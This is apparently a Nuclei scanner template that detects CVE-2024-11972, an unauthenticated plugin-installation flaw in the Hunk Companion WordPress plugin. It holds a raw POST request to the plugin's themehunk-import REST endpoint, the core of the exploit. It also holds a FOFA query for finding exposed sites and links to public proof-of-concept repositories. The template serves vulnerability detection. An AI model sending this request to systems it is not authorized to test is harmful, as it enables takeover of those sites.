漏洞描述
The plugin does not correctly authorize some REST API endpoints, allowing unauthenticated requests to install and activate arbitrary plugins from the WordPress.org repo, including vulnerable plugins that have been closed.
id: CVE-2024-11972
info:
name: Hunk Companion < 1.9.0 - Unauthenticated Plugin Installation
author: s4e-io
severity: critical
description: |
The plugin does not correctly authorize some REST API endpoints, allowing unauthenticated requests to install and activate arbitrary plugins from the WordPress.org repo, including vulnerable plugins that have been closed.
reference:
- https://wpscan.com/vulnerability/4963560b-e4ae-451d-8f94-482779c415e4/
- https://github.com/JunTakemura/exploit-CVE-2024-11972
- https://github.com/Nxploited/CVE-2024-11972-PoC
- https://github.com/RonF98/CVE-2024-11972-POC
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-11972
epss-score: 0.91677
epss-percentile: 0.99658
cpe: cpe:2.3:a:themehunk:hunk_companion:*:*:*:*:*:wordpress:*:*
metadata:
vendor: themehunk
product: hunk_companion
framework: wordpress
fofa-query: body="/wp-content/plugins/hunk-companion/"
tags: cve,cve-2024,wordpress,wp,wp-plugin,hunk-companion,vkev,vuln
variables:
plugin: "{{to_lower(rand_text_alpha(6))}}"
x-wp-nonce: "{{to_lower(rand_text_alpha(12))}}"
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-json/hc/v1/themehunk-import HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"params":{"templateType":"free","plugin":{"{{plugin}}": "{{plugin}}"},"allPlugins":[{"{{plugin}}": "{{plugin}}/{{plugin}}.php"}]},"headers":{"X-WP-Nonce":"{{x-wp-nonce}}"}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- '"\"https:\\\/\\\/'
- type: word
part: content_type_2
words:
- "application/json"
- type: status
status:
- 200
# digest: 4a0a0047304502206d47548bce669d40293008918f871af1f5ae457196048da2d8cf4341ace1cc04022100f4a2986959937268117f4aa48465536909ee13bb0ddaeb816ea2c1149bd8c8ce:922c64590222798bb761d5b6d8e72950